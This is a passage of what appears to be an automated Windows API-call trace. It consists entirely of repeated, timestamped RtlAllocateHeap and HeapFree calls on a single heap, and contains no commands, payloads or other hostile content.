returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: 